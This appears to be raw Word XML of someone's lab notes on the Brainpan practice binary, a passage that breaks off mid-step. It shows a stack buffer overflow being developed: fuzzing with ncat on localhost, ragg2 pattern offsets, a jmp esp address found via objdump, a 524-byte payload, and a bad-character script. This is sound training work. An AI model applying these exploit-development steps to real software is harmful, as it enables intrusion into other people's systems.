      <w:r w:rsidR="00DA603E">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612011B8" w14:textId="36ABD5FC" w:rsidR="005744B6" w:rsidRPr="009F1AB8" w:rsidRDefault="005744B6" w:rsidP="009C24B8">
      <w:r w:rsidRPr="009F1AB8">
        <w:t xml:space="preserve">Brainpan.exe, check to see if it </w:t>
      </w:r>
      <w:r w:rsidR="007C44A0" w:rsidRPr="009F1AB8">
        <w:t xml:space="preserve">is vulnerable to buffer overflow </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B2178" w14:textId="5110DD41" w:rsidR="003577F8" w:rsidRDefault="003577F8" w:rsidP="003577F8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003577F8">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>python3 -c "print('1'*9999)" | ncat 127.0.0.1 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6311B8BC" w14:textId="72CE68D1" w:rsidR="00026D74" w:rsidRDefault="00026D74" w:rsidP="003577F8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="2E2256"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73981721" wp14:editId="0715FDFA">
            <wp:extent cx="5943600" cy="4247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5FE8" w14:textId="1EFF9D17" w:rsidR="0055612C" w:rsidRPr="00073423" w:rsidRDefault="0055612C" w:rsidP="009C24B8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073423">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>Brainpab.exe crashes</w:t>
      </w:r>
      <w:r w:rsidR="0022606D">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="0022606D" w:rsidRPr="0022606D">
        <w:t>- click show details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D283AFB" w14:textId="7D7ACC25" w:rsidR="00A64941" w:rsidRPr="00073423" w:rsidRDefault="00E85943">
      <w:pPr>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073423">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>The crash message says unhandled exception: page fault</w:t>
      </w:r>
      <w:r w:rsidR="00480624">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00073423">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>on 0x000… in 32-bit code</w:t>
      </w:r>
      <w:r w:rsidR="00480624">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t xml:space="preserve"> / read access to 0x000…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71641D0B" w14:textId="5CC7FF5A" w:rsidR="004337BB" w:rsidRDefault="004337BB" w:rsidP="00846C39">
      <w:r w:rsidRPr="004337BB">
        <w:t>The crash means the exe is vulnerable to the De Bruijn sequence</w:t>
      </w:r>
      <w:r w:rsidR="00846C39">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5E117" w14:textId="4E2A676A" w:rsidR="00B447CE" w:rsidRDefault="0029167B" w:rsidP="00846C39">
      <w:r w:rsidRPr="0029167B">
        <w:t>Time to exploit the exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCE3E93" w14:textId="3D02EFC4" w:rsidR="007F702D" w:rsidRDefault="007F702D" w:rsidP="00846C39">
      <w:r>
        <w:t>However, we have a problem. We have no way of exploiting the exe. Time to download another tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2250C003" w14:textId="77777777" w:rsidR="007F702D" w:rsidRDefault="007F702D" w:rsidP="007F702D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Switch kali to NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B5176F" w14:textId="0F539688" w:rsidR="007F702D" w:rsidRPr="00925F18" w:rsidRDefault="006311DE" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="005A1501" w:rsidRPr="00925F18">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">it clone </w:t>
      </w:r>
      <w:r w:rsidR="00925F18" w:rsidRPr="00925F18">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>https://github.com/radare/radare2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72441D7D" w14:textId="0C28E066" w:rsidR="00925F18" w:rsidRDefault="005734B0" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r w:rsidR="00925F18" w:rsidRPr="00925F18">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> radare2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C2A4DE" w14:textId="062BE1E9" w:rsidR="00925F18" w:rsidRDefault="005734B0" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00925F18">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ys/install.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F13B0" w14:textId="4D3F8F51" w:rsidR="00925F18" w:rsidRDefault="006A2FA2" w:rsidP="00846C39">
      <w:r>
        <w:t>It will take a while to install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A0433" w14:textId="2465E95A" w:rsidR="00B5475A" w:rsidRPr="00B5475A" w:rsidRDefault="00B5475A" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Switch kali back to Host-only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359309CD" w14:textId="7A2FDA0F" w:rsidR="0029167B" w:rsidRDefault="0029167B" w:rsidP="0029167B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Wine brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E4414" w14:textId="335B4E98" w:rsidR="00B447CE" w:rsidRDefault="00761637" w:rsidP="00846C39">
      <w:r w:rsidRPr="004A27E0">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Ragg2 -P 9999 -r | ncat 127.0.0.1 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E2EB12" w14:textId="65B0CD23" w:rsidR="00F82A05" w:rsidRDefault="0022606D" w:rsidP="00846C39">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ABAB79E" wp14:editId="7823048F">
            <wp:extent cx="5486400" cy="201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2245" w14:textId="1FBD81F5" w:rsidR="003E77C2" w:rsidRDefault="003E77C2" w:rsidP="00846C39">
      <w:r>
        <w:t xml:space="preserve">Exe crashed. Take note of EIP and ESP. </w:t>
      </w:r>
      <w:r w:rsidR="008726EF">
        <w:t xml:space="preserve">Modifying EIP will allow me to modify the execution flow of the exe and </w:t>
      </w:r>
      <w:r w:rsidR="00D22AB0">
        <w:t>modifying the ESP can allow me to control the contents of the address.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442F4708" w14:textId="0F0E2CFD" w:rsidR="00024C8E" w:rsidRDefault="00024C8E" w:rsidP="00846C39">
      <w:r>
        <w:t>Next, I need to find out the endian values</w:t>
      </w:r>
      <w:r w:rsidR="00D23EEE">
        <w:t xml:space="preserve"> from the EIP value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C215FDF" w14:textId="1A3E07A9" w:rsidR="00CF59EB" w:rsidRDefault="00CF59EB" w:rsidP="00CF59EB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>ine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>dgb</w:t>
      </w:r>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06116D69" w14:textId="656736C5" w:rsidR="009B0DAE" w:rsidRDefault="009B0DAE" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A27E0">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Ragg2 -</w:t>
      </w:r>
      <w:r w:rsidR="00AD2CFB">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r w:rsidR="00D14513">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D23EEE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>0x</w:t>
      </w:r>
      <w:r w:rsidR="00B67F7B">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>32343134</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F39F4" w14:textId="142A9396" w:rsidR="00B67F7B" w:rsidRDefault="00B67F7B" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Little endian -1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1D3FEA" w14:textId="406C97E4" w:rsidR="00B67F7B" w:rsidRDefault="00B67F7B" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Big endian -1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210BDAB9" w14:textId="6C9BFD29" w:rsidR="00B67F7B" w:rsidRPr="00B67F7B" w:rsidRDefault="00B67F7B" w:rsidP="00846C39">
      <w:r>
        <w:t xml:space="preserve">Fairly sure that was supposed to have something other than -1. After some research, </w:t>
      </w:r>
      <w:r w:rsidR="00CF59EB">
        <w:t>determined it was winedgb not working correctly, so I went back to start with wine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC4D29" w14:textId="50E4C244" w:rsidR="009B0DAE" w:rsidRDefault="00680D7C" w:rsidP="009B0DAE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="009B0DAE" w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>ine brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05539D55" w14:textId="1D039896" w:rsidR="00CF59EB" w:rsidRDefault="00CF59EB" w:rsidP="00CF59EB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A27E0">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Ragg2 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>q 0x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>43413243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E48F30" w14:textId="77777777" w:rsidR="00CF59EB" w:rsidRDefault="00CF59EB" w:rsidP="009B0DAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E8937F" wp14:editId="496F5809">
            <wp:extent cx="3943350" cy="752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4F25" w14:textId="52F73D36" w:rsidR="00246F39" w:rsidRDefault="00246F39" w:rsidP="009B0DAE">
      <w:r w:rsidRPr="00246F39">
        <w:lastRenderedPageBreak/>
        <w:t>I need to find out if I can use a ROP gadget</w:t>
      </w:r>
      <w:r w:rsidR="00CF59EB">
        <w:t xml:space="preserve"> and took note of the little endian.</w:t>
      </w:r>
      <w:r w:rsidR="00D6397E">
        <w:t xml:space="preserve"> I created a payload that will let me check if I can get chars to EIP and ESP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099CA5BB" w14:textId="351DEE9E" w:rsidR="001211D9" w:rsidRPr="00F021FE" w:rsidRDefault="001211D9" w:rsidP="001211D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E2256"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F021FE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ragg2 -P </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">524 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F021FE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-r | ncat 127.0.0.1 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA20797" w14:textId="2EA86D76" w:rsidR="001211D9" w:rsidRPr="00246F39" w:rsidRDefault="001211D9" w:rsidP="009B0DAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E7C138C" wp14:editId="4906A6DE">
            <wp:extent cx="5495925" cy="1752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26D3" w14:textId="38382C5A" w:rsidR="009B0DAE" w:rsidRDefault="002D7ECD" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011445D">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Printf “111122223333</w:t>
      </w:r>
      <w:r w:rsidR="0011445D" w:rsidRPr="0011445D">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>” &gt; payloadsuffix.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9073AD" w14:textId="08B05F15" w:rsidR="00B5475A" w:rsidRPr="00F021FE" w:rsidRDefault="00B5475A" w:rsidP="00B5475A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2E2256"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F021FE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ragg2 -P </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">524 </w:t>
      </w:r>
      <w:r w:rsidRPr="00F021FE">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-r -C payloadsuffix.txt | ncat 127.0.0.1 9999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0A3D2E" w14:textId="3BBDB0D2" w:rsidR="00F021FE" w:rsidRDefault="00D733EC" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E86376" wp14:editId="193C5CB8">
            <wp:extent cx="5438775" cy="1952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480B" w14:textId="21F41AD4" w:rsidR="00D733EC" w:rsidRPr="00D733EC" w:rsidRDefault="00D733EC" w:rsidP="00846C39">
      <w:r w:rsidRPr="00D733EC">
        <w:t>Well, I definitely changed the error output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D62FB2" w14:textId="7257DAD3" w:rsidR="00063B24" w:rsidRDefault="00063B24" w:rsidP="00846C39">
      <w:r w:rsidRPr="009A6378">
        <w:t>Based on research, I knew I needed to find the jmp esp. That same research also told me that its FF E4</w:t>
      </w:r>
      <w:r w:rsidR="009A6378" w:rsidRPr="009A6378">
        <w:t xml:space="preserve"> in an objdump.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72D726" w14:textId="68D27AA0" w:rsidR="009A6378" w:rsidRDefault="00DB7CC5" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="009A6378" w:rsidRPr="00E363D1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>bjdump</w:t>
      </w:r>
      <w:r w:rsidR="009A6378">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009A6378" w:rsidRPr="00E363D1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-d brainpan.exe | grep “FF E4”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A545712" w14:textId="58CDCBF4" w:rsidR="00DB7CC5" w:rsidRDefault="00DB7CC5" w:rsidP="00DB7CC5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00E363D1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>bjdump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E363D1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-d brainpan.exe | grep “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ff</w:t>
      </w:r>
      <w:r w:rsidRPr="00E363D1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00E363D1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>4”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70305666" w14:textId="5D877105" w:rsidR="00E363D1" w:rsidRDefault="00DB7CC5" w:rsidP="00846C39">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03230A60" wp14:editId="7251C11D">
            <wp:extent cx="5029200" cy="65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BDE2" w14:textId="1DAF2CD8" w:rsidR="00754AE8" w:rsidRDefault="00754AE8" w:rsidP="00846C39">
      <w:r w:rsidRPr="00754AE8">
        <w:t>Found that jmp esp is 0x311712f3</w:t>
      </w:r>
      <w:r w:rsidR="00ED0A41">
        <w:t>. To make use of jmp esp, I need to enter it backwards and ensure that a python script has no trailing line feeds (end=’’). The format will go ‘a’ * little endian, end=’’</w:t>
      </w:r>
      <w:r w:rsidR="001343B6">
        <w:t xml:space="preserve"> then append the jmp esp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964452D" w14:textId="77777777" w:rsidR="00ED0A41" w:rsidRPr="00ED0A41" w:rsidRDefault="00ED0A41" w:rsidP="00ED0A41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0A41">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>python3 -c "print('a' * 524, end='')" &gt; payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85BD70" w14:textId="64582E3D" w:rsidR="00ED0A41" w:rsidRDefault="00ED0A41" w:rsidP="00ED0A41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0A41">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>printf "\xf3\x12\x17\x31" &gt;&gt; payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F2B6D9" w14:textId="0A7FD0F8" w:rsidR="001343B6" w:rsidRPr="001343B6" w:rsidRDefault="001343B6" w:rsidP="00ED0A41">
      <w:r w:rsidRPr="001343B6">
        <w:t xml:space="preserve">Next, I need to create a file with 256 </w:t>
      </w:r>
      <w:r>
        <w:t>chars</w:t>
      </w:r>
      <w:r w:rsidRPr="001343B6">
        <w:t xml:space="preserve"> w/o null (x00), tab (t), space, carriage return®, and line(n) or form(xff) feed.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The chars need to be in the latin1 encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA8DCC" w14:textId="51E619A4" w:rsidR="001343B6" w:rsidRDefault="001343B6" w:rsidP="00ED0A41">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nano payload.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4743444F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>#! /usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA07611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>forbidden = '\x00\t \r\n\xff'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE758A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>chars = b''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095029A5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>for i in range(0, 256):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A51D1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 xml:space="preserve">    char = chr(i)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01A595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 xml:space="preserve">    if char in forbidden:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2939F2C3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 xml:space="preserve">        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22EE12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 xml:space="preserve">    chars += char.encode('latin1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A13EA19" w14:textId="77777777" w:rsidR="001343B6" w:rsidRP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>with open('chars.txt', 'wb') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB98B7" w14:textId="1235FB0A" w:rsidR="001343B6" w:rsidRDefault="001343B6" w:rsidP="001343B6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001343B6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">    f.write(chars)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEC628F" w14:textId="187425C5" w:rsidR="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>chmod +x payload.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD9C611" w14:textId="3D653C45" w:rsidR="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>./payload.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC5EAC5" w14:textId="2A92D522" w:rsidR="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Cat chars.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E07458D" w14:textId="2162A26E" w:rsidR="00FE0F82" w:rsidRPr="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82">
      <w:r w:rsidRPr="00FE0F82">
        <w:t>I check the output of the created files to confirm its what I wanted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76BF8B" w14:textId="2183F970" w:rsidR="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Hexdump -C payload.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F04FD73" w14:textId="2C3AEDA5" w:rsidR="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Hexdump -C chars.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBBB013" w14:textId="7E25503D" w:rsidR="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82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8842D9E" wp14:editId="447B9383">
            <wp:extent cx="5943600" cy="3453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94D7" w14:textId="0CBFDB20" w:rsidR="00FE0F82" w:rsidRPr="00FE0F82" w:rsidRDefault="00FE0F82" w:rsidP="00FE0F82">
      <w:r w:rsidRPr="00FE0F82">
        <w:t>I took note of fe</w:t>
      </w:r>
      <w:r w:rsidR="00ED1F5D">
        <w:t xml:space="preserve"> (which is a solid square and ])</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0F82">
        <w:t xml:space="preserve"> as the last byte of chars.txt</w:t>
      </w:r>
      <w:r w:rsidR="00850B04">
        <w:t>. I want to cat the files then pipe them into ncat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20340170" w14:textId="77777777" w:rsidR="00850B04" w:rsidRDefault="00850B04" w:rsidP="00850B04">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>ine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>dgb</w:t>
      </w:r>
      <w:r w:rsidRPr="009C24B8">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> brainpan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671B82C3" w14:textId="0627DEDD" w:rsidR="00FE0F82" w:rsidRDefault="00850B04" w:rsidP="00FE0F82">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
